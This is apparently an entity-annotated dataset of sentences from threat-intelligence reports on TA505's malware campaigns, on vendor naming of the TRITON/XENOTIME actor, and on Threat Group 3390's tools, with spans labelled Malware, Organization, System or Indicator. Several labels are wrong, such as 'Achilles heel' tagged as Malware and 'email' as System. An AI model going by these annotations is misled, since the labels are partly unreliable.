four months with Dridex , Locky became the payload of choice for TA505 , eclipsing earlier campaigns in terms of volume and reach .", "spans": [{"start": 44, "end": 50, "label": "Malware"}, {"start": 53, "end": 58, "label": "Malware"}, {"start": 92, "end": 97, "label": "Organization"}]} {"text": "TA505 stopped distributing Dridex in July 2016 , relying almost exclusively on Locky through December of that year .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 27, "end": 33, "label": "Malware"}, {"start": 79, "end": 84, "label": "Malware"}]} {"text": "Like Dridex , Locky is also distributed in an affiliate model ; TA505 exclusively distributes Locky Affid=3 .", "spans": [{"start": 5, "end": 11, "label": "Malware"}, {"start": 14, "end": 19, "label": "Malware"}, {"start": 64, "end": 69, "label": "Organization"}, {"start": 94, "end": 99, "label": "Malware"}]} {"text": "Low-volume campaigns distributed Dridex during much of 2015 Moderate volumes of Dridex appeared from the end of 2015 through February 2016 ; it is worth noting that these \u201c moderate volume \u201d campaigns were , at the time , the largest campaigns ever observed .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 80, "end": 86, "label": "Malware"}]} {"text": "Alternating Dridex and Locky campaigns of varying volumes appeared through May 2016 .", "spans": [{"start": 12, "end": 18, "label": "Malware"}, {"start": 23, "end": 28, "label": "Malware"}]} {"text": "A lull in June 2016 associated with a disruption in the Necurs botnet ; TA505 is heavily reliant on this massive botnet to send out high-volume malicious spam campaigns and disappearances of TA505 activity frequently accompany disruptions in Necurs .", "spans": [{"start": 56, "end": 62, "label": "Malware"}, {"start": 72, "end": 77, "label": "Organization"}, {"start": 191, "end": 196, "label": "Organization"}, {"start": 242, "end": 248, "label": "Malware"}]} {"text": "Extremely high-volume campaigns 
distributing Locky exclusively in July 2016 , consistently delivering tens of millions of messages .", "spans": [{"start": 45, "end": 50, "label": "Malware"}]} {"text": "Another lull in November 2016 saw the complete absence of Locky and Dridex , while high-volume campaigns reappeared in December , albeit at lower volumes than during the Q3 2016 peak .", "spans": [{"start": 58, "end": 63, "label": "Malware"}, {"start": 68, "end": 74, "label": "Malware"}]} {"text": "An expected break following the 2016-2017 winter holidays turned into an unexplained three-month hiatus for TA505 .", "spans": [{"start": 108, "end": 113, "label": "Organization"}]} {"text": "Large-scale Dridex and Locky campaigns returned in Q2 2017 , although none reached the volumes we observed in mid-2016 .", "spans": [{"start": 12, "end": 18, "label": "Malware"}, {"start": 23, "end": 28, "label": "Malware"}]} {"text": "Later campaigns saw new attachment types , even as Dridex and Locky payloads remained largely unchanged .", "spans": [{"start": 51, "end": 57, "label": "Malware"}, {"start": 62, "end": 67, "label": "Malware"}]} {"text": "Locky distribution ceased in June and July but returned in August with volumes rivaling the peaks of 2016 .", "spans": [{"start": 0, "end": 5, "label": "Malware"}]} {"text": "TA505 turned to URLs in early August 2017 to distribute Locky , finally eschewing the document or zipped script attachments that have characterized the majority of their Locky campaigns since February 2016 ; most of these URLs linked to malicious documents and scripts .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 56, "end": 61, "label": "Malware"}, {"start": 98, "end": 104, "label": "System"}, {"start": 170, "end": 175, "label": "Malware"}]} {"text": "By later August , TA505 had turned back to large attachment campaigns , primarily distributing various zipped scripts that downloaded Locky .", "spans": [{"start": 18, "end": 23, "label": "Organization"}, {"start": 103, 
"end": 109, "label": "System"}, {"start": 134, "end": 139, "label": "Malware"}]} {"text": "The group continued this pattern with occasional URL campaigns and attached HTML files bearing malicious links .", "spans": [{"start": 76, "end": 80, "label": "System"}]} {"text": "TA505 first introduced Rockloader in April 2016 as an intermediate loader for Locky .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 23, "end": 33, "label": "Malware"}, {"start": 67, "end": 73, "label": "System"}, {"start": 78, "end": 83, "label": "Malware"}]} {"text": "At that time , Rockloader was the initial payload downloaded by malicious attached JavaScript files .", "spans": [{"start": 15, "end": 25, "label": "Malware"}, {"start": 83, "end": 93, "label": "System"}]} {"text": "Once Rockloader was installed , it downloaded Locky and , in some cases , Pony and Kegotip .", "spans": [{"start": 5, "end": 15, "label": "Malware"}, {"start": 46, "end": 51, "label": "Malware"}, {"start": 74, "end": 78, "label": "Malware"}, {"start": 83, "end": 90, "label": "Malware"}]} {"text": "Pony is another loader with information stealing capabilities while Kegotip is a credential and email address harvesting malware strain that would appear in a small number of TA505 campaigns the following year as the primary payload .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 16, "end": 22, "label": "System"}, {"start": 68, "end": 75, "label": "Malware"}, {"start": 96, "end": 101, "label": "System"}, {"start": 175, "end": 180, "label": "Organization"}]} {"text": "Bart ransomware appeared for exactly one day on June 24 , 2016 .", "spans": [{"start": 0, "end": 4, "label": "Malware"}]} {"text": "It was a secondary payload downloaded by Rockloader , the initial payload in a large email campaign using zipped JavaScript attachments .", "spans": [{"start": 41, "end": 51, "label": "Malware"}, {"start": 85, "end": 90, "label": "System"}, {"start": 106, "end": 112, "label": "System"}, 
{"start": 113, "end": 123, "label": "System"}]} {"text": "The Bart ransom screen was visually similar to Locky \u2019s but Bart had one important distinction : it could encrypt files without contacting a command and control server .", "spans": [{"start": 4, "end": 8, "label": "Malware"}, {"start": 47, "end": 52, "label": "Malware"}, {"start": 60, "end": 64, "label": "Malware"}]} {"text": "However , we have not seen Bart since , suggesting that this was either an experiment or that the ransomware did not function as expected for TA505 .", "spans": [{"start": 27, "end": 31, "label": "Malware"}, {"start": 142, "end": 147, "label": "Organization"}]} {"text": "TA505 briefly distributed the Kegotip information stealer in April 2017 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 30, "end": 37, "label": "Malware"}, {"start": 38, "end": 57, "label": "System"}]} {"text": "Across two campaigns of several million messages each , the actor used both macro laden Microsoft Word documents and zipped VBScript attachments to install the Trojan on potential victim PCs .", "spans": [{"start": 76, "end": 81, "label": "System"}, {"start": 88, "end": 97, "label": "Organization"}, {"start": 98, "end": 102, "label": "System"}, {"start": 117, "end": 123, "label": "System"}, {"start": 124, "end": 132, "label": "System"}, {"start": 160, "end": 166, "label": "Malware"}, {"start": 187, "end": 190, "label": "System"}]} {"text": "Kegotip is an infostealer ( credentials and email addresses ) used to facilitate other crimeware activities .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 14, "end": 25, "label": "System"}, {"start": 44, "end": 49, "label": "System"}]} {"text": "It steals credentials from various FTP clients , Outlook , and Internet Explorer .", "spans": [{"start": 35, "end": 38, "label": "Indicator"}, {"start": 49, "end": 56, "label": "System"}, {"start": 63, "end": 80, "label": "System"}]} {"text": "It also will gather email addresses 
scraped from files stored on the computer .", "spans": [{"start": 20, "end": 25, "label": "System"}]} {"text": "This information can be used to facilitate future spam campaigns by the perpetrator or may be sold to other actors .", "spans": []} {"text": "TA505 introduced Jaff ransomware in May 2017 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 17, "end": 21, "label": "Malware"}]} {"text": "Jaff was not dramatically different from other ransomware strains .", "spans": [{"start": 0, "end": 4, "label": "Malware"}]} {"text": "The payment portal was initially similar to the one used by Locky and Bart .", "spans": [{"start": 60, "end": 65, "label": "Malware"}, {"start": 70, "end": 74, "label": "Malware"}]} {"text": "It was primarily notable for its high-volume campaigns and its association with TA505 , given the actor \u2019s propensity for massive campaigns and ability to dominate the email landscape .", "spans": [{"start": 80, "end": 85, "label": "Organization"}, {"start": 168, "end": 173, "label": "System"}]} {"text": "Jaff appeared in multi-million message campaigns for roughly a month and then promptly disappeared as soon as a decryptor was released in mid-June 2017 .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 112, "end": 121, "label": "System"}]} {"text": "The Trick , also known as Trickbot , is another banking Trojan that TA505 first began distributing in June of 2017 , although we have observed The Trick in the wild since fall 2016 , usually in regionally targeted campaigns .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 26, "end": 34, "label": "Malware"}, {"start": 56, "end": 62, "label": "Malware"}, {"start": 68, "end": 73, "label": "Organization"}, {"start": 147, "end": 152, "label": "Malware"}]} {"text": "It is generally considered a descendant of the Dyreza banking Trojan and features multiple modules .", "spans": [{"start": 47, "end": 53, "label": "Malware"}, {"start": 62, "end": 68, 
"label": "Malware"}]} {"text": "The main bot is responsible for persistence , the downloading of additional modules , loading affiliate payloads , and loading updates for the malware .", "spans": []} {"text": "As with much of the malware distributed by TA505 , The Trick has appeared in frequent , high-volume campaigns .", "spans": [{"start": 43, "end": 48, "label": "Organization"}, {"start": 55, "end": 60, "label": "Malware"}]} {"text": "The campaigns used a mix of attached zipped scripts ( WSF , VBS ) , malicious Microsoft Office documents ( Word , Excel ) , HTML attachments , password-protected Microsoft Word documents , links to malicious JavaScript , and other vectors .", "spans": [{"start": 37, "end": 43, "label": "System"}, {"start": 54, "end": 57, "label": "System"}, {"start": 60, "end": 63, "label": "System"}, {"start": 78, "end": 87, "label": "Organization"}, {"start": 88, "end": 94, "label": "System"}, {"start": 107, "end": 111, "label": "System"}, {"start": 114, "end": 119, "label": "System"}, {"start": 124, "end": 128, "label": "System"}, {"start": 162, "end": 171, "label": "Organization"}, {"start": 172, "end": 176, "label": "System"}, {"start": 208, "end": 218, "label": "System"}]} {"text": "The last TA505 campaigns featuring The Trick appeared in mid-September 2017 with payloads alternating between Locky and The Trick .", "spans": [{"start": 9, "end": 14, "label": "Organization"}, {"start": 39, "end": 44, "label": "Malware"}, {"start": 110, "end": 115, "label": "Malware"}, {"start": 124, "end": 129, "label": "Malware"}]} {"text": "Philadelphia ransomware has been circulating since September 2016 .", "spans": [{"start": 0, "end": 12, "label": "Malware"}]} {"text": "It first attracted our attention in April of this year when we observed an actor customizing the malware for use in highly targeted campaigns .", "spans": []} {"text": "In a brief stint , TA505 distributed it in one large campaign in July , but we have not seen them use it since .", 
"spans": [{"start": 19, "end": 24, "label": "Organization"}]} {"text": "GlobeImposter is another ransomware strain that saw relatively small-scale distribution until TA505 began including it in malicious spam campaigns at the end of July 2017 .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 94, "end": 99, "label": "Organization"}]} {"text": "TA505 primarily distributed GlobeImposter in zipped script attachments through the beginning of September 2017 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 28, "end": 41, "label": "Malware"}, {"start": 45, "end": 51, "label": "System"}]} {"text": "Again , GlobeImposter is not particularly innovative but TA505 elevated the ransomware from a regional variant to a major landscape feature during roughly six weeks of large campaigns .", "spans": [{"start": 8, "end": 21, "label": "Malware"}, {"start": 57, "end": 62, "label": "Organization"}]} {"text": "TA505 is arguably one of the most significant financially motivated threat actors because of the extraordinary volumes of messages they send .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "The variety of malware delivered by the group also demonstrates their deep connections to the underground malware scene .", "spans": []} {"text": "At the time of writing , Locky ransomware remains their malware of choice , even as the group continues to experiment with a variety of additional malware .", "spans": [{"start": 25, "end": 30, "label": "Malware"}]} {"text": "The history of TA505 is instructive because they: Have proven to be highly adaptable , shifting techniques and malware frequently to \u201c follow the money \u201d , while largely sticking to successful strategies where possible Are flexible , using largely interchangeable components , innovating where necessary on the malware front and using off-the-shelf malware where possible Operate at massive scale , consistently driving global trends in malware 
distribution and message volume .", "spans": [{"start": 15, "end": 20, "label": "Organization"}]} {"text": "Each of these elements makes TA505 a magnifying lens through which to consider the framework employed by many modern threat actors .", "spans": [{"start": 29, "end": 34, "label": "Organization"}]} {"text": "Such a framework typically consists of five elements :", "spans": []} {"text": "Actor : The attacker organization ; real humans driven by various motivations -- In the case of TA505 , the motivations are financial .", "spans": [{"start": 96, "end": 101, "label": "Organization"}]} {"text": "Vector : The delivery mechanism ; email via attacker-controlled or leased spam botnet -- Necurs for TA505 -- remains a dominant vector , and certainly the vector of choice for this actor .", "spans": [{"start": 34, "end": 39, "label": "System"}, {"start": 89, "end": 95, "label": "Malware"}, {"start": 100, "end": 105, "label": "Organization"}]} {"text": "Hoster : The sites hosting malware ; if malware is not directly attached to email , then macro enabled documents , malicious scripts , or exploit kits will pull payloads from these servers .", "spans": [{"start": 76, "end": 81, "label": "System"}, {"start": 89, "end": 94, "label": "System"}]} {"text": "TA505 almost exclusively hosts malware in this way , although they vary the means of installing their final payloads on victim machines .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "Payload : The malware ; software that will enable the attacker to make use of ( control , exfiltrate data from , or download more software to ) the target computer .", "spans": []} {"text": "For TA505 , the payloads have shifted over the years and months of their activity , but their sending and hosting infrastructure make these changes relatively simple to implement .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]} {"text": "C&C : The command and control channel that serves to relay commands between the 
installed malware and attackers .", "spans": [{"start": 0, "end": 3, "label": "System"}, {"start": 10, "end": 29, "label": "System"}]} {"text": "TA505 operates a variety of C&C servers , allowing it to be resilient in the case of takedowns , sinkholes , and other defensive operations .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 28, "end": 31, "label": "System"}]} {"text": "This framework enables attackers to operate in robust , horizontally segmented ecosystems , specializing in developing certain parts of the framework , and selling or leasing to others ; such frameworks are resistant to takedowns and individual component failures .", "spans": []} {"text": "But such frameworks also increase attackers' detection surface , that is , their susceptibility to discovery .", "spans": []} {"text": "In the case of TA505 , while most elements of the framework are well-developed , their reliance on the Necurs botnet for sending high-volume malicious spam - a key component of the Vector element above - appears to be their Achilles heel .", "spans": [{"start": 15, "end": 20, "label": "Organization"}, {"start": 103, "end": 109, "label": "Malware"}, {"start": 224, "end": 232, "label": "Malware"}]} {"text": "A XENOTIME to Remember : Veles in the Wild .", "spans": [{"start": 2, "end": 10, "label": "Organization"}, {"start": 25, "end": 30, "label": "System"}]} {"text": "Release_Time : 2019-12-04", "spans": []} {"text": "Report_URL : https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/", "spans": []} {"text": "\u201c When I use a word , \u201d Humpty Dumpty said , in rather a scornful tone , \u201c it means just what I choose it to mean\u2014neither more nor less. 
\u201d \u2013 Through the Looking Glass , Lewis Carroll FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the \u201c TRITON actor \u201d when preparing to deploy the TRITON S-MAL/TRISIS malware framework in 2017 .", "spans": [{"start": 153, "end": 166, "label": "Organization"}, {"start": 183, "end": 190, "label": "Organization"}, {"start": 287, "end": 293, "label": "Malware"}, {"start": 331, "end": 350, "label": "Malware"}]} {"text": "Overall , the post does a commendable job in making public findings previously only privately shared ( presumably by FireEye , and in several reports I authored for my employer , Dragos ) to threat intelligence customers .", "spans": [{"start": 117, "end": 124, "label": "Organization"}, {"start": 179, "end": 185, "label": "Organization"}]} {"text": "As such , the blog continues to push forward the narrative of how ICS attacks are enabled through prepositioning and initial intrusion operations \u2013 an item I have discussed at length .", "spans": []} {"text": "Yet one point of confusion in the blog comes at the very start : referring to the entity responsible for TRITON as the \u201c TRITON actor \u201d .", "spans": [{"start": 105, "end": 111, "label": "Malware"}, {"start": 121, "end": 127, "label": "Malware"}]} {"text": "This seems confusing as FireEye earlier publicly declared the \u201c TRITON actor \u201d as a discrete entity , linked to a Russian research institution , and christened it as \u201c TEMP.Veles \u201d .", "spans": [{"start": 24, "end": 31, "label": "Organization"}, {"start": 64, "end": 70, "label": "Malware"}, {"start": 168, "end": 178, "label": "Organization"}]} {"text": "In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON , with subsequent public presentations at Cyberwarcon and the Kaspersky Lab sponsored Security Analyst Summit essentially linking 
TRITON and the research institute ( and therefore TEMP.Veles ) as one and the same .", "spans": [{"start": 38, "end": 48, "label": "Organization"}, {"start": 51, "end": 58, "label": "Organization"}, {"start": 127, "end": 137, "label": "Organization"}, {"start": 160, "end": 166, "label": "Malware"}, {"start": 209, "end": 220, "label": "Organization"}, {"start": 229, "end": 242, "label": "Organization"}, {"start": 253, "end": 276, "label": "Organization"}, {"start": 297, "end": 303, "label": "Malware"}, {"start": 347, "end": 357, "label": "Organization"}]} {"text": "Yet the most-recent posting covering TTPs from initial access through prerequisites to enable final delivery of effects on target ( deploying TRITON S-MAL/TRISIS ) avoids the use of the TEMP.Veles term entirely .", "spans": [{"start": 37, "end": 41, "label": "Indicator"}, {"start": 142, "end": 161, "label": "Malware"}, {"start": 186, "end": 196, "label": "Organization"}]} {"text": "In subsequent discussion , FireEye personnel indicate that there was not \u201c an avalanche of evidence to substantiate \u201d anything more than \u201c TRITON actor \u201d \u2013 summing matters by indicating this term \u201c is the best we \u2019ve got for the public for now \u201d .", "spans": [{"start": 27, "end": 34, "label": "Organization"}, {"start": 139, "end": 145, "label": "Malware"}]} {"text": "Meanwhile , parallel work at Dragos ( my employer , where I have performed significant work on the activity described above ) uncovered similar conclusions concerning TTPs and behaviors , for both the 2017 event and subsequent activity in other industrial sectors .", "spans": [{"start": 29, "end": 35, "label": "Organization"}, {"start": 167, "end": 171, "label": "Indicator"}]} {"text": "Utilizing Diamond Model methodology for characterizing activity by behaviors attached to victims , we began tracking TRITON S-MAL/TRISIS and immediate enabling activity as a distinct activity group ( collection of behaviors , infrastructure , 
and victimology ) designated XENOTIME .", "spans": [{"start": 117, "end": 136, "label": "Malware"}, {"start": 272, "end": 280, "label": "Organization"}]} {"text": "Based on information gained from discussion with the initial TRITON S-MAL/TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye \u2019s analysis published in April 2019 , described in various media .", "spans": [{"start": 61, "end": 80, "label": "Malware"}, {"start": 151, "end": 157, "label": "Organization"}, {"start": 242, "end": 249, "label": "Organization"}]} {"text": "At this stage , we have two similar , parallel constructions of events \u2013 the how behind the immediate deployment and execution of TRITON S-MAL/TRISIS \u2013 yet dramatically different responses in terms of attribution and labeling .", "spans": [{"start": 130, "end": 149, "label": "Malware"}]} {"text": "Since late 2018 , based upon the most-recent posting , FireEye appears to have \u201c walked back \u201d the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the \u201c TRITON actor \u201d , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": [{"start": 55, "end": 62, "label": "Organization"}, {"start": 130, "end": 140, "label": "Organization"}, {"start": 188, "end": 194, "label": "Malware"}, {"start": 211, "end": 217, "label": "Organization"}, {"start": 294, "end": 302, "label": "Organization"}]} {"text": "Given that both organizations appear to describe similar ( if not identical ) activity , any reasonable person could ( and should ) ask \u2013 why the inconsistency in naming and identification? 
Aside from the competitive vendor naming landscape ( which I am not a fan of in cases of direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos \u2019 approaches with respect to the \u201c TRITON actor \u201d comes down to fundamental philosophical differences in methodology .", "spans": [{"start": 431, "end": 438, "label": "Organization"}, {"start": 443, "end": 449, "label": "Organization"}, {"start": 485, "end": 491, "label": "Malware"}]} {"text": "As wonderfully described in a recent public posting , FireEye adheres to a naming convention based upon extensive data collection and activity comparison , designed to yield the identification of a discrete , identifiable entity responsible for a given collection of activity .", "spans": [{"start": 54, "end": 61, "label": "Organization"}]} {"text": "This technique is precise and praiseworthy \u2013 yet at the same time , appears so rigorous as to impose limitations on the ability to dynamically adjust and adapt to emerging adversary activity . ( Or for that matter , even categorize otherwise well-known historical actors operating to the present day , such as Turla . 
) FireEye \u2019s methodology may have particular limitations in instances where adversaries ( such as XENOTIME and presumably TEMP.Veles ) rely upon extensive use of publicly-available , commonly-used tools with limited amounts of customization .", "spans": [{"start": 310, "end": 315, "label": "Organization"}, {"start": 320, "end": 327, "label": "Organization"}, {"start": 416, "end": 424, "label": "Organization"}, {"start": 440, "end": 450, "label": "Organization"}]} {"text": "In such cases , utilizing purely technical approaches for differentiation ( an issue I lightly touched on in a recent post ) becomes problematic , especially when trying to define attribution to specific , \u201c who-based \u201d entities ( such as a Russian research institute ) .", "spans": []} {"text": "My understanding is FireEye labels entities where definitive attribution is not yet possible with the \u201c TEMP \u201d moniker ( hence , TEMP.Veles ) \u2013 yet in this case FireEye developed and deployed the label , then appeared to move away from it in subsequent reporting .", "spans": [{"start": 20, "end": 27, "label": "Organization"}, {"start": 129, "end": 139, "label": "Organization"}, {"start": 161, "end": 168, "label": "Organization"}]} {"text": "Based on the public blog post \u2013 which also indicated that FireEye is responding to an intrusion at a second facility featuring the same or similar observations \u2013 this is presumably not for lack of evidence , yet the \u201c downgrade \u201d occurs all the same .", "spans": [{"start": 58, "end": 65, "label": "Organization"}]} {"text": "In comparison , XENOTIME was defined based on principles of infrastructure ( compromised third-party infrastructure and various networks associated with several Russian research institutions ) , capabilities ( publicly- and commercially-available tools with varying levels of customization ) and targeting ( an issue not meant for discussion in this blog ) .", "spans": [{"start": 16, "end": 24, 
"label": "Organization"}]} {"text": "In personally responding to several incidents across multiple industry sectors since early 2018 matching TTPs from the TRITON S-MAL/TRISIS event , these items proved consistent and supported the creation of the XENOTIME activity group .", "spans": [{"start": 105, "end": 109, "label": "Indicator"}, {"start": 119, "end": 138, "label": "Malware"}, {"start": 211, "end": 219, "label": "Organization"}]} {"text": "This naming decision was founded upon the underlying methodology described in the Diamond Model of intrusion analysis .", "spans": []} {"text": "As such , this decision does not necessarily refer to a specific institution , but rather a collection of observations and behaviors observed across multiple , similarly-situated victims .", "spans": []} {"text": "Of note , this methodology of naming abstracts away the \u201c who \u201d element \u2013 XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events .", "spans": [{"start": 74, "end": 82, "label": "Organization"}]} {"text": "Ultimately , the epistemic foundation of the behavior-based naming approach makes this irrelevant for tracking ( and labeling for convenience sake ) observations .", "spans": []} {"text": "Much like the observers watching the shadows of objects cast upon the wall of the cave , these two definitions ( XENOTIME and TEMP.Veles , both presumably referring to \u201c the TRITON actor \u201d ) describe the same phenomena , yet at the same time appear different .", "spans": [{"start": 113, "end": 121, "label": "Organization"}, {"start": 126, "end": 136, "label": "Organization"}, {"start": 174, "end": 180, "label": "Malware"}]} {"text": "This question of perception and accuracy rests upon the underlying epistemic framework and the goal conceived for that framework in defining an adversary : FireEye \u2019s methodology follows 
a deductive approach requiring the collection of significant evidence over time to yield a conclusion that will be necessary given the premises ( the totality of evidence suggests APTxx ) ; the Dragos approach instead seeks an inductive approach , where premises may all be true but the conclusion need not necessarily follow from them given changes in premises over time or other observations not contained within the set ( thus , identified behaviors strongly suggest an activity group , defined as X ) .", "spans": [{"start": 156, "end": 163, "label": "Organization"}, {"start": 381, "end": 387, "label": "Organization"}]} {"text": "From an external analyst \u2019s point of view , the wonder is , which is superior to the other? And my answer for this is : neither is perfect , but both are useful \u2013 depending upon your goals and objectives .", "spans": []} {"text": "But rather than trying to pursue some comparison between the two for identification of superiority ( an approach that will result in unproductive argument and social media warring ) , the point of this post is to highlight the distinctions between these approaches and how \u2013 in the case of \u201c the TRITON actor \u201d \u2013 they result in noticeably different conclusions from similar datasets .", "spans": [{"start": 296, "end": 302, "label": "Malware"}]} {"text": "One reason for the distinction may be differences in evidence , as FireEye \u2019s public reporting notes two distinct events of which they are aware and have responded to related to \u201c the TRITON actor \u201d while Dragos has been engaged in several instances \u2013 thus , Dragos would possess more evidence to cement the definition of an activity group , while FireEye \u2019s data collection-centric approach would require far more observations to yield an \u201c APT \u201d .", "spans": [{"start": 67, "end": 74, "label": "Organization"}, {"start": 184, "end": 190, "label": "Malware"}, {"start": 205, "end": 211, "label": 
"Organization"}, {"start": 259, "end": 265, "label": "Organization"}, {"start": 348, "end": 355, "label": "Organization"}]} {"text": "Yet irrespective of this , it is confusing why the previously-declared \u201c TEMP \u201d category was walked back as this has led to not small amount of confusion \u2013 in both technical and non-technical audiences \u2013 as to just what FireEye \u2019s blog post refers .", "spans": [{"start": 220, "end": 227, "label": "Organization"}]} {"text": "Thus respected journalists ( at least by me ) conflate the \u201c TRITON actor is active at another site \u201d with \u201c TRITON malware was identified at another site \u201d .", "spans": [{"start": 61, "end": 67, "label": "Malware"}, {"start": 109, "end": 115, "label": "Malware"}]} {"text": "In this case , we \u2019re seeing a definite problem with the overly-conservative naming approach used as it engenders confusion in a significant subset of the intended audience .", "spans": []} {"text": "While some may dismiss adversary or activity naming as so much marketing , having a distinct label for something allows for clearer communication and more accurate discussion .", "spans": []} {"text": "Furthermore , conflating adversaries with tools , since tools can be repurposed or used by other entities than those first observed deploying them , leads to further potential confusion as the \u201c X actor \u201d is quickly compressed in the minds of some to refer to any and all instantiations of tool \u201c X \u201d .", "spans": [{"start": 195, "end": 196, "label": "System"}, {"start": 297, "end": 298, "label": "System"}]} {"text": "Overall , the discussion above may appear so much splitting of hairs or determining how many angels can dance on the head of a pin \u2013 yet given the communicative impacts behind different naming and labeling conventions , this exploration seems not merely useful but necessary .", "spans": []} {"text": "Understanding the \u201c how \u201d and \u201c why \u201d behind 
different entity classifications of similar ( or even the same ) activity allows us to move beyond the dismissive approach of \u201c everyone has their names for marketing purposes \u201d to a more productive mindset that grasps the fundamental methodologies that ( should ) drive these decisions .", "spans": []} {"text": "Threat Group 3390 Cyberespionage .", "spans": [{"start": 0, "end": 17, "label": "Organization"}]} {"text": "CTU researchers have observed TG-3390 actors using tools that are favored by multiple threat groups :", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 30, "end": 37, "label": "Organization"}]} {"text": "PlugX \u2014 A remote access tool notable for communications that may contain HTTP headers starting with \" X- \" ( e.g. , \" X-Session : 0 \" ) .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 73, "end": 77, "label": "Indicator"}, {"start": 118, "end": 127, "label": "System"}]} {"text": "Its presence on a compromised system allows a threat actor to execute a wide variety of commands , including uploading and downloading files , and spawning a reverse shell .", "spans": []} {"text": "The malware can be configured to use multiple network protocols to avoid network-based detection .", "spans": []} {"text": "DLL side loading is often used to maintain persistence on the compromised system .", "spans": [{"start": 0, "end": 3, "label": "System"}]} {"text": "HttpBrowser ( also known as TokenControl ) \u2014 A backdoor notable for HTTPS communications with the HttpBrowser User-Agent .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 28, "end": 40, "label": "Malware"}, {"start": 68, "end": 73, "label": "Indicator"}, {"start": 98, "end": 109, "label": "Malware"}, {"start": 110, "end": 120, "label": "System"}]} {"text": "HttpBrowser 's executable code may be obfuscated through structured exception handling and return-oriented programming .", "spans": [{"start": 0, "end": 11, "label": 
"Malware"}]} {"text": "Its presence on a compromised system allows a threat actor to spawn a reverse shell , upload or download files , and capture keystrokes .", "spans": []} {"text": "Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures .", "spans": [{"start": 24, "end": 35, "label": "Malware"}]} {"text": "DLL side loading has been used to maintain persistence on the compromised system .", "spans": [{"start": 0, "end": 3, "label": "System"}]} {"text": "ChinaChopper web shell \u2014 A web-based executable script that allows a threat actor to execute commands on the compromised system .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 13, "end": 22, "label": "System"}]} {"text": "The server-side component provides a simple graphical user interface for threat actors interacting with web shells .", "spans": [{"start": 104, "end": 114, "label": "System"}]} {"text": "Hunter \u2014 A web application scanning tool written by @tojen to identify vulnerabilities in Apache Tomcat , Red Hat JBoss Middleware , and Adobe ColdFusion .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 90, "end": 103, "label": "System"}, {"start": 106, "end": 130, "label": "System"}, {"start": 137, "end": 153, "label": "System"}]} {"text": "It can also identify open ports , collect web banners , and download secondary files .", "spans": []} {"text": "The following tools appear to be exclusive to TG-3390 : OwaAuth web shell \u2014 A web shell and credential stealer deployed to Microsoft Exchange servers .", "spans": [{"start": 46, "end": 53, "label": "Organization"}, {"start": 56, "end": 63, "label": "Malware"}, {"start": 64, "end": 73, "label": "System"}, {"start": 78, "end": 87, "label": "System"}, {"start": 103, "end": 110, "label": "System"}, {"start": 123, "end": 132, "label": "Organization"}, {"start": 133, "end": 141, "label": "System"}]} {"text": "It is installed as an ISAPI filter .", "spans": [{"start": 22, 
"end": 34, "label": "System"}]} {"text": "Captured credentials are DES encrypted using the password \" 12345678 \" and are written to the log.txt file in the root directory .", "spans": []} {"text": "Like the ChinaChopper web shell , the OwaAuth web shell requires a password .", "spans": [{"start": 9, "end": 21, "label": "Malware"}, {"start": 22, "end": 31, "label": "System"}, {"start": 38, "end": 45, "label": "Malware"}, {"start": 46, "end": 55, "label": "System"}]} {"text": "However , the OwaAuth web shell password contains the victim organization's name .", "spans": [{"start": 14, "end": 21, "label": "Malware"}, {"start": 22, "end": 31, "label": "System"}]} {"text": "ASPXTool \u2014 A modified version of the ASPXSpy web shell .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 37, "end": 44, "label": "Malware"}, {"start": 45, "end": 54, "label": "System"}]} {"text": "It is deployed to internally accessible servers running Internet Information Services ( IIS ) .", "spans": [{"start": 56, "end": 85, "label": "System"}, {"start": 88, "end": 91, "label": "System"}]} {"text": "TG-3390 actors have also used the following publicly available tools :", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "Windows Credential Editor ( WCE ) \u2014 obtains passwords from memory . gsecdump \u2014 obtains passwords from memory . winrar \u2014 compresses data for Exfiltration . 
